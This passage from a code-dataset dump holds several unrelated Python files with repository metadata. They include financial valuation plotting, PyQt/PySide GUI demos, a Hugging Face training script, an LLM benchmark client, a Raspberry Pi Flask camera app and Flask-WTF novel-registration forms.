申万一级行业有28个\n\n#date='2014-02-20',23个\ncode1 = jd.get_industries(name='sw_l1', date='2013-01-20')\n\n#date='2014-02-21'有34个\ncode2 = jd.get_industries(name='sw_l1', date='2014-02-21')\n\n#date='2014-02-22'有28个\ncode3 = jd.get_industries(name='sw_l1', date='2015-02-22')\n'''\n\ndef get_sw1_valuation(start_date=None, end_date=None):\n #2014-02-22之后申万一级行业28个\n code = jd.get_industries(name='sw_l1',date='2014-02-22').index.tolist()\n days = jd.get_trade_days(start_date,end_date)\n index = jd.finance.run_query(jd.query(jd.finance.SW1_DAILY_VALUATION).filter(\n jd.finance.SW1_DAILY_VALUATION.date=='2014-02-22'\n ).limit(1)).columns.tolist()\n data = pd.DataFrame(columns = index)\n for day in days:\n df=jd.finance.run_query(jd.query(jd.finance.SW1_DAILY_VALUATION).filter(\n jd.finance.SW1_DAILY_VALUATION.code.in_(code),\n jd.finance.SW1_DAILY_VALUATION.date==day\n ))\n name1 = set(list(map(lambda x:x[:-1],jd.get_industries(name='sw_l1',date='2014-02-22').name.tolist())))\n name2 = set(df.name.tolist())\n if not name1-name2:\n data = pd.concat([data, df], axis = 0, sort=False)\n return data\n'''\ndf = get_sw1_valuation(start_date='2015-01-01',end_date='2020-05-01') \ndf = df.set_index(['date']).drop(['id'], axis=1)\ndf.to_csv('D:\\\\spyder_code\\\\jqfactor_analyzer01\\\\华泰单因子测试之估值类因子\\\\申万一级行业估值数据.csv',\\\n encoding='utf_8_sig')\n'''\n\ndef plot_fig(factor):\n plt.rcParams['font.sans-serif'] = ['SimHei'] \n index = data.unstack('name')[factor].index\n for i in index:\n fig, ax = plt.subplots(1,1,figsize=(14,6))\n x=data.unstack('name')[factor].loc[i,:].index\n height=data.unstack('name')[factor].loc[i,:].values\n ax.set_title(i)\n ax.bar(x=x,height=height)\n ax.plot(data.unstack('name')[factor].loc[i,:])\n ax.grid(True)\n plt.xticks(rotation=30) # 设置x轴标签旋转角度\n fig.savefig('D:\\\\spyder_code\\\\jqfactor_analyzer01\\\\华泰单因子测试之估值类因子'\\\n +'\\\\%s_%s.png'%(factor,i.strftime('%Y-%m-%d')))\n \nif __name__ == '__main__': \n df = pd.read_csv('D:\\\\spyder_code\\\\jqfactor_analyzer01\\\\华泰单因子测试之估值类因子\\\\申万一级行业估值数据.csv',\\\n index_col=['date'])\n df.index = pd.to_datetime(df.index)\n data = df[['pe','pb']].groupby(df['name']).resample('Y',how='mean')\n plot_fig('pe')\n\n\n\n \n \n\n\n","repo_name":"Jackyoubin/JQ_FS","sub_path":"华泰单因子测试之估值类因子/申万一级行业估值数据.py","file_name":"申万一级行业估值数据.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42927309113","text":"\"\"\"使用lambda、partial传递参数\"\"\"\nimport sys\nfrom functools import partial\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QHBoxLayout\n\n\nclass LambdaOrPartial(QWidget):\n def __init__(self, parent=None):\n super().__init__(parent)\n # 定义两个按钮\n btn1 = QPushButton('Button 1', self)\n btn2 = QPushButton('Button 2', self)\n btn11 = QPushButton('Button 11', self)\n btn21 = QPushButton('Button 21', self)\n\n # 设置布局\n layout = QHBoxLayout()\n # 添加到布局\n layout.addWidget(btn1)\n layout.addWidget(btn2)\n layout.addWidget(btn11)\n layout.addWidget(btn21)\n # 把布局添加到窗口\n self.setLayout(layout)\n\n # 设置窗口\n self.setWindowTitle('使用lambda, partial来传递参数')\n self.resize(400, 300)\n\n # lambda\n btn1.clicked.connect(lambda: self.on_button_clicked(1))\n btn2.clicked.connect(lambda: self.on_button_clicked(2))\n\n # partial\n btn11.clicked.connect(partial(self.on_button_clicked, 11))\n btn21.clicked.connect(partial(self.on_button_clicked, 21))\n\n def on_button_clicked(self, n):\n print(\"Button{0} is clicked.\".format(n))\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n my_lambda_partial_window = LambdaOrPartial()\n my_lambda_partial_window.show()\n\n sys.exit(app.exec_())","repo_name":"pooking/pyqt5_tutorial","sub_path":"signalAndSlot/lambda_or_partial.py","file_name":"lambda_or_partial.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4213913184","text":"import numpy as np\n\nimport importlib,sys\nimportlib.reload(sys)\n\ntarget = \"../dataset/train_questions.txt\"\n\nrand_i = np.random.choice(range(36190),size=500,replace=False)\nwith open(target,encoding='UTF8') as f, open(\"../dataset/target.txt\", \"w\",encoding='UTF8') as f2:\n count = 1\n for line in f:\n # print(f.read())\n if count in rand_i:\n f2.write(line)\n count += 1\n\n","repo_name":"lxm0/PythonTest","sub_path":"python/shiyan/word2vector/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29361563794","text":"import logging\nimport os\nfrom enum import auto\nfrom enum import Enum\nfrom typing import Optional\n\nimport requests\nfrom requests.exceptions import HTTPError\n\n\nlogger = logging.getLogger(__name__)\n\nFLASK_URL = \"http://localhost:{}/benchmark\"\n\nCACHE_DIR = os.environ.get(\"HUGGINGFACE_HUB_CACHE\")\nassert CACHE_DIR, \"HUGGINGFACE_HUB_CACHE environment variable not set\"\n\n\nclass ModelType(Enum):\n GPTQ = auto()\n AWQ = auto()\n OTHER = auto()\n\n\nclass BenchmarkConfig:\n def __init__(\n self,\n framework: str,\n model: str,\n quant_types: list,\n limit: int,\n run_always: bool,\n query: str,\n max_tokens: int,\n temperature: float,\n flask_port: int,\n ):\n self.framework = framework\n self.model = model\n self.quant_types = quant_types\n self.limit = limit\n self.run_always = run_always\n self.query = query\n self.max_tokens = max_tokens\n self.temperature = temperature\n self.flask_port = flask_port\n\n\nclass CloudConfig:\n def __init__(\n self,\n provider: str,\n model: str,\n query: str,\n max_tokens: int,\n temperature: float,\n limit: int,\n run_always: bool,\n ):\n self.provider = provider\n self.model = model\n self.query = query\n self.max_tokens = max_tokens\n self.temperature = temperature\n self.limit = limit\n self.run_always = run_always\n\n\ndef determine_model_type(model_name: str) -> ModelType:\n if \"GPTQ\" in model_name:\n return ModelType.GPTQ\n elif \"AWQ\" in model_name:\n return ModelType.AWQ\n else:\n return ModelType.OTHER\n\n\ndef bench_all_models(\n framework: str,\n quant_types: list,\n model_names: list[str],\n model_status: dict[str, dict],\n limit: int,\n run_always: bool,\n query: str,\n max_tokens: int,\n temperature: float,\n flask_port: int,\n) -> None:\n for model in model_names[:limit]:\n model_type = determine_model_type(model)\n is_limit_reached = run_benchmark_for_type(\n framework,\n model,\n quant_types,\n model_status,\n model_type,\n limit,\n run_always,\n query,\n max_tokens,\n temperature,\n flask_port,\n )\n if is_limit_reached:\n break\n\n\ndef run_benchmark_for_type(\n framework: str,\n model: str,\n quant_types: list,\n model_status: dict[str, dict],\n model_type: ModelType,\n limit: int,\n run_always: bool,\n query: str,\n max_tokens: int,\n temperature: float,\n flask_port: int,\n) -> bool:\n config = BenchmarkConfig(\n framework,\n model,\n quant_types,\n limit,\n run_always,\n query,\n max_tokens,\n temperature,\n flask_port,\n )\n if model_type == ModelType.GPTQ:\n return run_benchmark(config, model_status, \"gptq\", \"4bit\")\n elif model_type == ModelType.AWQ:\n return run_benchmark(config, model_status, \"awq\", \"4bit\")\n else:\n for quant in quant_types:\n quant_method = \"bitsandbytes\" if quant is not None else None\n if run_benchmark(config, model_status, quant_method, quant):\n return True\n return False\n\n\ndef run_benchmark(\n config: BenchmarkConfig,\n model_status: dict[str, dict],\n quant_method: Optional[str],\n quant_bits: Optional[str],\n) -> bool:\n \"\"\"\n Run benchmark for a given model and quantization type.\n Returns True if the limit is reached, False otherwise.\n \"\"\"\n quant_str = f\"{quant_method}_{quant_bits}\" if quant_method is not None else \"none\"\n print(f\"Running benchmark: {config.model}, quant: {quant_str}\")\n\n flask_data = {\n \"framework\": config.framework,\n \"model_name\": config.model,\n \"query\": config.query,\n \"quant_method\": quant_method,\n \"quant_bits\": quant_bits,\n \"max_tokens\": config.max_tokens,\n \"temperature\": config.temperature,\n \"run_always\": config.run_always,\n }\n try:\n response = requests.post(FLASK_URL.format(config.flask_port), data=flask_data)\n response.raise_for_status()\n except HTTPError as http_err:\n print(f\"HTTP error occurred: {http_err}\")\n model_status[f\"{config.model}_{quant_str}\"] = {\"status_code\": 500, \"json\": {}}\n return False\n except Exception as err:\n print(f\"Other error occurred: {err}\")\n model_status[f\"{config.model}_{quant_str}\"] = {\"status_code\": 500, \"json\": {}}\n return False\n else:\n response_code = response.status_code\n response_json = response.json()\n print(f\"Finished benchmark: {config.model}, quant: {quant_str} with Status Code: {response_code}\")\n\n model_status[f\"{config.model}_{quant_str}\"] = {\"status_code\": response_code, \"json\": response_json}\n return len(model_status) >= config.limit\n\n\ndef print_summary(model_status: dict[str, dict]) -> None:\n \"\"\"\n Print a summary of the benchmark runs.\n \"\"\"\n print(\"Summary of benchmark runs:\")\n skipped_models = []\n for model, response in model_status.items():\n status = response[\"json\"][\"status\"] if \"json\" in response and \"status\" in response[\"json\"] else \"unknown\"\n if status == \"skipped\":\n skipped_models.append(model)\n continue\n\n if skipped_models:\n print(f\"Skipped models: {', '.join(skipped_models)} ⏭️\")\n\n for model, response in model_status.items():\n status = response[\"json\"][\"status\"] if \"json\" in response and \"status\" in response[\"json\"] else \"unknown\"\n if status == \"skipped\":\n continue\n elif response[\"status_code\"] == 200:\n print(f\"Model: {model}, {response['status_code']} ✅ (Benchmark Successful)\")\n elif response[\"status_code\"] == 500:\n print(f\"Model: {model}, {response['status_code']} ❌ (Benchmark Failed)\")\n else:\n print(f\"Model: {model}, {response['status_code']} ❓ (Unknown Status)\")\n print(\"🎊 Done 🎊\")\n","repo_name":"cipher982/llm-benchmarks","sub_path":"api/llm_bench_api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"41467895258","text":"from PySide6 import QtWidgets\nfrom PySide6.QtCore import Qt\n\nclass LabelledSlider(QtWidgets.QWidget):\n \"\"\" Slider with labels and value text\"\"\"\n def __init__(self, name: str, min_value: int, max_value: int, value: int, tick_interval: int=10, name_width=10, value_width=30, value_units=\"°\"):\n super().__init__()\n\n self.units = value_units\n\n self.name_label = QtWidgets.QLabel(name)\n self.name_label.setFixedWidth(name_width)\n\n self.slider = QtWidgets.QSlider(Qt.Horizontal)\n self.slider.setRange(min_value, max_value)\n self.slider.setTickInterval(tick_interval)\n self.slider.valueChanged.connect(self._on_value_changed)\n\n self.value_label = QtWidgets.QLabel(str(value) + value_units)\n self.value_label.setFixedWidth(value_width)\n self.value_label.setAlignment(Qt.AlignRight)\n\n layout = QtWidgets.QHBoxLayout()\n layout.addWidget(self.name_label)\n layout.addWidget(self.slider)\n layout.addWidget(self.value_label)\n layout.setContentsMargins(0,0,0,0)\n\n self.setLayout(layout)\n\n\n def _on_value_changed(self):\n self.value_label.setText(\"%i\"%self.value() + self.units)\n\n @property\n def valueChanged(self):\n return self.slider.valueChanged\n\n def value(self) -> int:\n return int(self.slider.value())\n\n","repo_name":"SasView/sasview","sub_path":"src/sas/qtgui/Perspectives/ParticleEditor/LabelledSlider.py","file_name":"LabelledSlider.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"10590324247","text":"import sys\r\nfrom PySide2.QtWidgets import QApplication, QMainWindow, QAction, qApp\r\nfrom PySide2.QtGui import QIcon\r\n\r\nclass Example(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n self.statusBar().showMessage('准备就绪')\r\n self.setGeometry(300,300,400,200)\r\n self.setWindowTitle('test')\r\n\r\n exitact = QAction(QIcon('picture.jpeg'),'退出(&E)',self)\r\n exitact.setShortcut('Ctrl+Q')\r\n exitact.setStatusTip('退出程序')\r\n exitact.triggered.connect(qApp.quit)\r\n\r\n menubar = self.menuBar()\r\n fileMenu = menubar.addMenu('文件(&F)')\r\n fileMenu.addAction(exitact)\r\n\r\n self.show()\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = Example()\r\n app.exec_()","repo_name":"wangcoolc/Python_For_Qt","sub_path":"pyside2_basic/Main/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"23074135336","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef readDataset(path):\n X = pd.read_csv(path, usecols=[i for i in range(11)]).to_numpy()\n y = pd.read_csv(path, usecols=[\"quality\"]).to_numpy()\n trainX, testX, trainY, testY = train_test_split(\n X, y, test_size=0.3, random_state=0)\n sc = StandardScaler()\n trainX = sc.fit_transform(trainX)\n testX = sc.fit_transform(testX)\n # train_test_split is giving dim(n, 1) when it should be dim(n,)\n\n # Finding the index of outliers in categories with ourliers using the winsorization method\n va_out = winsorization_outliers(\n trainX[:, 1], \"volitile acidity\", True, True)\n rs_out = winsorization_outliers(\n trainX[:, 5], \"residual sugar\", False, True)\n ch_out = winsorization_outliers(trainX[:, 6], \"chlorides\", False, True)\n sl_out = winsorization_outliers(trainX[:, 9], \"sulphates\", True, True)\n\n union = np.union1d(rs_out, ch_out)\n union = np.union1d(union, sl_out)\n union = np.union1d(union, va_out)\n\n trainX = np.delete(trainX, union, axis=0)\n trainY = np.delete(trainY, union, axis=0)\n\n #trainX, trainY = remove_rows(trainX, trainY, union)\n\n return trainX, trainY[:, 0], testX, testY[:, 0]\n\n# top_percent = boolean to determine if highest percentile should be removed\n# bottom_percent = boolean to determine if lowest percentile should be removed\n\n\ndef winsorization_outliers(df, label, top_percent, bottom_percent):\n q1 = np.percentile(df, 1)\n q3 = np.percentile(df, 99)\n out = []\n out_map = {}\n for i in range(len(df)):\n if (df[i] > q3 and top_percent) or (df[i] < q1 and bottom_percent):\n out.append(i)\n out_map[i] = df[i]\n #print(\"Outliers for label\" + label + \": \",out2)\n return out\n","repo_name":"KingJeremyNg/cps803-project","sub_path":"src/read_dataset.py","file_name":"read_dataset.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12335329758","text":"# Standard Library Imports\nimport os\nimport sys\n\nimport argparse\nimport evaluate\nimport wandb\nimport numpy as np\nimport pandas as pd\nfrom huggingface_hub import HfApi\nfrom transformers import (\n AutoTokenizer,\n AutoConfig,\n TrainingArguments,\n Trainer,\n AutoModelForSequenceClassification,\n DataCollatorWithPadding\n)\nfrom transformers.trainer_callback import EarlyStoppingCallback\nfrom datasets import load_metric, load_from_disk\n\nfrom params import default_cfg\n\n# Set environment variable for parallelism\nos.environ['TOKENIZERS_PARALLELISM'] = \"false\"\n\ndef parse_args():\n \"Overriding default arguments for model\"\n argparser = argparse.ArgumentParser(\n description=\"Process base parameters and hyperparameters\"\n )\n argparser.add_argument(\n \"--MODEL_NAME\",\n type=str,\n default=default_cfg.MODEL_NAME,\n help=\"Model architecture to use\"\n )\n argparser.add_argument(\n \"--NUM_EPOCHS\",\n type=int,\n default=default_cfg.NUM_EPOCHS,\n help=\"number of training epochs\"\n )\n argparser.add_argument(\n \"--TRAIN_BATCH_SIZE\",\n type=int,\n default=default_cfg.TRAIN_BATCH_SIZE,\n help=\"Train batch size\"\n )\n argparser.add_argument(\n \"--VALID_BATCH_SIZE\",\n type=int,\n default=default_cfg.VALID_BATCH_SIZE,\n help=\"Validation batch size\"\n )\n argparser.add_argument(\n \"--WARMUP_STEPS\",\n type=int,\n default=default_cfg.WARMUP_STEPS,\n help=\"number of warmup steps\"\n )\n argparser.add_argument(\n \"--LEARNING_RATE\",\n type=float,\n default=default_cfg.LEARNING_RATE,\n help=\"learning rate\"\n )\n argparser.add_argument(\n \"--FP16\",\n type=int,\n default=int(default_cfg.FP16),\n help=\"Set to true to use half precision\"\n )\n\n argparser.add_argument(\n \"--GRADIENT_ACCUMULATION_STEPS\",\n type=int,\n default=default_cfg.GRADIENT_ACCUMULATION_STEPS,\n help=\"Set to true to use half precision\"\n )\n\n return argparser.parse_args()\n\ndef load_data(run, cfg):\n \"\"\"\n Load training and validation datasets from Wandb Artifacts.\n\n Args:\n run (wandb.Run): Wandb run object.\n cfg (Config): Configuration object containing file paths and settings.\n\n Returns:\n train_dataset (datasets.Dataset): Training dataset.\n valid_dataset (datasets.Dataset): Validation dataset.\n \"\"\"\n # Load the latest training artifact from Wandb\n train_artifact = run.use_artifact(f\"{cfg.TRAIN_DATA_ARTIFACT}:latest\")\n \n # Download the training data to the specified folder\n train_artifact.download(root=cfg.TRAIN_DATA_FOLDER)\n \n # Load the training dataset from disk\n train_dataset = load_from_disk(cfg.TRAIN_DATA_FOLDER)\n\n # Load the latest validation artifact from Wandb\n valid_dataset = run.use_artifact(f\"{cfg.VALID_DATA_ARTIFACT}:latest\")\n \n # Download the validation data to the specified folder\n valid_dataset.download(root=cfg.VALID_DATA_FOLDER)\n \n # Load the validation dataset from disk\n valid_dataset = load_from_disk(cfg.VALID_DATA_FOLDER)\n\n # Identify columns to be dropped from the datasets\n drop_cols = [col for col in list(train_dataset.features) if col not in ['input_ids', 'attention_mask', 'rating']]\n\n # Remove unnecessary columns from both datasets\n train_dataset = train_dataset.remove_columns(drop_cols)\n valid_dataset = valid_dataset.remove_columns(drop_cols)\n\n # Rename 'rating' column to 'labels' for consistency\n train_dataset = train_dataset.rename_column('rating', 'labels')\n valid_dataset = valid_dataset.rename_column('rating', 'labels')\n\n # Set the format of the datasets to 'torch' for compatibility with PyTorch\n train_dataset.set_format('torch', columns=['input_ids', 'attention_mask', 'labels'])\n valid_dataset.set_format('torch', columns=['input_ids', 'attention_mask', 'labels'])\n\n return train_dataset, valid_dataset\n\ndef compute_metrics(eval_pred):\n \"\"\"\n Compute various classification metrics based on model predictions.\n\n Args:\n eval_pred (tuple): Tuple containing logits and labels.\n\n Returns:\n dict: Dictionary containing computed metrics (accuracy, f1-score, recall, precision).\n \"\"\"\n # Load evaluation metrics from the 'evaluate' module\n acc_metric = evaluate.load('accuracy')\n f1_metric = evaluate.load('f1')\n recall_metric = evaluate.load('recall')\n precision_metric = evaluate.load('precision')\n \n # Unpack logits and labels from eval_pred\n logits, labels = eval_pred\n \n # Compute predictions based on logits\n predictions = np.argmax(logits, axis=-1)\n \n # Compute accuracy\n acc = acc_metric.compute(predictions=predictions, references=labels)\n \n # Compute f1-score\n f1 = f1_metric.compute(predictions=predictions, references=labels, average='micro')\n \n # Compute recall\n recall = recall_metric.compute(predictions=predictions, references=labels, average='micro')\n \n # Compute precision\n precision = precision_metric.compute(predictions=predictions, references=labels, average='micro')\n\n return {\n \"accuracy\": acc['accuracy'],\n 'f1': f1[\"f1\"],\n 'recall': recall['recall'],\n 'precision': precision['precision']\n }\n\ndef train(cfg):\n \"\"\"\n Train a sequence classification model.\n\n Args:\n cfg (Config): Configuration object containing model training settings.\n\n Returns:\n None\n \"\"\"\n # Disable Wandb services (useful in some environments)\n os.environ['WANDB_DISABLE_SERVICE'] = 'True' \n\n # Initialize a new run with Wandb\n with wandb.init(\n project=cfg.PROJECT_NAME, job_type=cfg.MODEL_TRAINING_JOB_TYPE,\n config=dict(cfg)\n ) as run:\n cfg = wandb.config\n\n # Set up training arguments for the Trainer\n training_args = TrainingArguments(\n output_dir=cfg.MODEL_DATA_FOLDER,\n num_train_epochs=cfg.NUM_EPOCHS,\n per_device_train_batch_size=cfg.TRAIN_BATCH_SIZE,\n per_device_eval_batch_size=cfg.VALID_BATCH_SIZE,\n warmup_steps=cfg.WARMUP_STEPS,\n gradient_accumulation_steps=cfg.GRADIENT_ACCUMULATION_STEPS,\n fp16=bool(cfg.FP16),\n learning_rate=float(cfg.LEARNING_RATE),\n logging_dir=f\"{cfg.MODEL_DATA_FOLDER}/logs\",\n logging_steps=500,\n eval_steps=500,\n evaluation_strategy='steps',\n save_steps=500,\n save_total_limit=2,\n load_best_model_at_end=True,\n metric_for_best_model='accuracy',\n report_to='wandb'\n )\n\n # Load and prepare training and validation datasets\n train_dataset, valid_dataset = load_data(run, cfg)\n\n # Initialize tokenizer and data collator\n num_classes = cfg.NUM_CLASSES\n tokenizer = AutoTokenizer.from_pretrained(cfg.MODEL_NAME)\n data_collator = DataCollatorWithPadding(tokenizer=tokenizer)\n\n # Initialize the model for sequence classification\n model = AutoModelForSequenceClassification.from_pretrained(\n cfg.MODEL_NAME, num_labels=num_classes)\n\n # Initialize the Trainer with the defined settings\n trainer = Trainer(\n model,\n training_args,\n train_dataset=train_dataset,\n eval_dataset=valid_dataset,\n data_collator=data_collator,\n tokenizer=tokenizer,\n callbacks=[EarlyStoppingCallback(early_stopping_patience=3)],\n compute_metrics=compute_metrics\n )\n\n # Start the training process\n trainer.train()\n\n # Save the trained model to the specified directory\n trainer.save_model(cfg.MODEL_DATA_FOLDER)\n\n # Push both the model and tokenizer to the Hugging Face Model Hub\n model.push_to_hub(cfg.HUB_MODEL_ID)\n tokenizer.push_to_hub(cfg.HUB_MODEL_ID)\n\n # Get the current user from the Hugging Face API\n hf_api = HfApi()\n user = hf_api.whoami()\n\n # Create a new Wandb Artifact for the trained model\n trained_model_art = wandb.Artifact(cfg.MODEL_DATA_FOLDER, type=cfg.MODEL_TYPE)\n hub_id = cfg.HUB_MODEL_ID\n trained_model_art.metadata = {\"hub_id\": hub_id}\n\n # Log the trained model artifact to Wandb\n run.log_artifact(trained_model_art)\n\n\nif __name__ == \"__main__\":\n \n # Update the default configuration with parsed command-line arguments\n default_cfg.update(vars(parse_args()))\n \n # Call the 'train' function with the updated configuration\n train(default_cfg)","repo_name":"david-meltzer/Goodreads-Sentiment-Analysis","sub_path":"week_3/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33104419126","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template, Response\napp = Flask(__name__)\n\nfrom camera_pi import Camera\n\nimport Adafruit_DHT\nimport time\n\n# get data from DHT sensor\ndef getDHTdata():\t\t\n\tDHT11Sensor = Adafruit_DHT.DHT11\n\tDHTpin = 4\n\thum, temp = Adafruit_DHT.read_retry(DHT11Sensor, DHTpin)\n\t\n\tif hum is not None and temp is not None:\n\t\thum = round(hum)\n\t\ttemp = round(temp, 1)\n\treturn temp, hum\n\n\n@app.route(\"/\")\ndef index():\n\ttimeNow = time.asctime( time.localtime(time.time()) )\n\ttemp, hum = getDHTdata()\n\t\n\ttemplateData = {\n 'time': timeNow,\n 'temp': temp,\n 'hum'\t: hum\n\t}\n\treturn render_template('index.html', **templateData)\n\n@app.route('/camera')\ndef cam():\n\ttimeNow = time.asctime( time.localtime(time.time()) )\n\ttemplateData = {\n 'time': timeNow\n\t}\n\treturn render_template('camera.html', **templateData)\n\n\ndef gen(camera):\n while True:\n frame = camera.get_frame()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen(Camera()),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port =8000, debug=True, threaded=True)\n","repo_name":"JiaqiTu/EE629-IOT","sub_path":"project_improvement/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40366138507","text":"import requests\n\n# Flask imports\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField\nfrom wtforms import SubmitField\nfrom wtforms import BooleanField\nfrom wtforms import RadioField\nfrom wtforms import SelectField\nfrom wtforms import HiddenField\nfrom wtforms import ValidationError\nfrom wtforms_sqlalchemy.fields import QuerySelectField\nfrom wtforms.validators import DataRequired\nfrom wtforms.validators import Length\nfrom wtforms.validators import Regexp\n\n# Internal imports\nfrom app.models import SeriesTable\nfrom app.models import HonorificsTable\nfrom app.models import HostTable\nfrom app.models import HonorificAffix\nfrom app.scripts.dictionary import COMMON_DICT_ABBR\nfrom app.scripts.custom_errors import mono\n\nimport app.scripts.hostmanager as hostmgr\n\n\nclass RegisterNovelForm(FlaskForm):\n\t'''\n\t\tThis form is used when displaying the \"Register Novel\" modal to the user\n\t\tin the /libraries route\n\t'''\n\n\t# Field: title - The user's title for the novel to register\n\ttitle_validators = [\n\t\tDataRequired(),\n\t\tLength(min=1, max=80)\n\t]\n\ttitle = StringField('Title', validators=title_validators)\n\n\t# Field: abbr - The user's personal abbreviation for this novel\n\tabbr_validators = [\n\t\tDataRequired(),\n\t\tLength(min=1, max=20),\n\t\tRegexp(r'^[^\\W_]*$', message=\"Cannot contain spaces or special characters\")\n\t]\n\tabbr = StringField('Abbreviation', validators=abbr_validators)\n\n\t# Field: series_host - The host configuration for this series\n\tseries_host = QuerySelectField( \"Host\",\n\t\t\t\t\t\t\t\t\tquery_factory=lambda: HostTable.query,\n\t\t\t\t\t\t\t\t\tget_label='host_name',\n\t\t\t\t\t\t\t\t\tallow_blank=False )\n\n\t# Field: series_code - The identifying code for this series\n\tseries_code_validators = [\n\t\tDataRequired(),\n\t]\n\tseries_code = StringField('Series Code', validators=series_code_validators)\n\n\t# Submit form\n\tsubmit = SubmitField('Register')\n\n\t# Custom validator for title\n\tdef validate_title(self, title):\n\t\ttitle_data = title.data.strip()\n\t\tseries_entry = SeriesTable.query.filter_by(title=title_data).first()\n\t\tif series_entry is not None:\n\t\t\traise ValidationError(\"This title is already taken by another series\")\n\n\t# Custom validator for abbreviation\n\tdef validate_abbr(self, abbr):\n\t\tabbr_data = abbr.data.strip()\n\t\tif abbr_data == COMMON_DICT_ABBR:\n\t\t\traise ValidationError(\"The abbreviation \\'%s\\' is illegal\" % abbr_data)\n\n\t\t# Validation: this abbreviation must not already be taken\n\t\tseries_entry = SeriesTable.query.filter_by(abbr=abbr_data).first()\n\t\tif series_entry is not None:\n\t\t\traise ValidationError(\"The abbreviation \\'%s\\' is taken by another series\" % abbr_data)\n\n\t# Custom validator for series code\n\tdef validate_series_code(self, series_code):\n\t\t# Validation: the host-code combination must not already be in the database\n\t\tseries_code_data = series_code.data.strip()\n\t\thost_entry = self.series_host.data\n\t\tseries_entry = SeriesTable.query.filter_by(code=str(series_code_data), host_id=host_entry.id).first()\n\t\tif series_entry is not None:\n\t\t\traise ValidationError(\"This host-code combination already registered as %s\" % series_entry.abbr)\n\n\t\t# Validation: the url must exist\n\t\thost_manager = hostmgr.createManager(host_entry.host_type)\n\t\turl = host_manager.generateSeriesUrl(str(series_code_data))\n\t\ttry:\n\t\t\tcookies = { 'over18': 'yes' }\n\t\t\theaders = { 'User-Agent' : 'Mozilla/5.0' }\n\t\t\tresponse = requests.get(url,\n\t\t\t\tcookies=cookies,\n\t\t\t\theaders=headers,\n\t\t\t\tverify=False)\n\n\t\t\tif not response.status_code == 200:\n\t\t\t\tif response.status_code == 404:\n\t\t\t\t\traise ValidationError(\"%s does not exist\" % mono(url))\n\t\t\t\traise Exception\n\t\t# Some error has occurred\n\t\texcept Exception as e:\n\t\t\traise ValidationError(\"No response from %s\" % mono(url))\n\nclass EditNovelForm(FlaskForm):\n\t'''\n\t\tThis form is used when displaying the \"Edit Novel\" modal to the user\n\t\tin the /libraries route\n\t'''\n\tseries_id = HiddenField(\"Series Id\")\n\n\t# Field: title - The user's title for the novel to register\n\ttitle_validators = [\n\t\tDataRequired(),\n\t\tLength(min=1, max=80)\n\t]\n\ttitle = StringField('Title', validators=title_validators)\n\n\t# Field: abbr - The user's personal abbreviation for this novel\n\tabbr_validators = [\n\t\tDataRequired(),\n\t\tLength(min=1, max=20),\n\t\tRegexp(r'^[\\w]+$', message=\"Cannot contain spaces or special characters\")\n\t]\n\tabbr = StringField('Abbreviation', validators=abbr_validators)\n\n\t# Submit form\n\tsubmit = SubmitField('Save')\n\n\t# Custom validator for title\n\tdef validate_title(self, title):\n\t\t# Submission invalid if there's another SeriesTable entry w/ a diff id but same title\n\t\ttitle_data = title.data.strip()\n\t\tnot_id = SeriesTable.query.filter(SeriesTable.id != int(self.series_id.data))\n\t\tif not_id.filter_by(title=title_data).count() > 0:\n\t\t\traise ValidationError(\"%s is already registered\" % title_data)\n\n\t# Custom validator for abbreviation\n\tdef validate_abbr(self, abbr):\n\t\tabbr_data = abbr.data.strip()\n\t\tif abbr_data == COMMON_DICT_ABBR:\n\t\t\traise ValidationError(\"The abbreviation \\'%s\\' is illegal\" % abbr_data)\n\n\t\t# Validation: this abbreviation must not already be taken\n\t\tnot_id = SeriesTable.query.filter(SeriesTable.id != int(self.series_id.data))\n\t\tif not_id.filter_by(abbr=abbr_data).count() > 0:\n\t\t\traise ValidationError(\"The abbreviation \\'%s\\' is taken by another series\" % abbr_data)\n\nclass RemoveNovelForm(FlaskForm):\n\t'''\n\t\tConfirmaton form used when user tries to remove a novel from library\n\t\tin the /libraries route\n\t'''\n\topt_keep_dict = BooleanField(\"Keep the dictionary associated with this series?\", default=True)\n\n\tsubmit = SubmitField('Remove')\n\nclass AddHonorificForm(FlaskForm):\n\t'''\n\t\tThis form is used when displaying the \"Add Honorific\" modal to the user\n\t\tin the 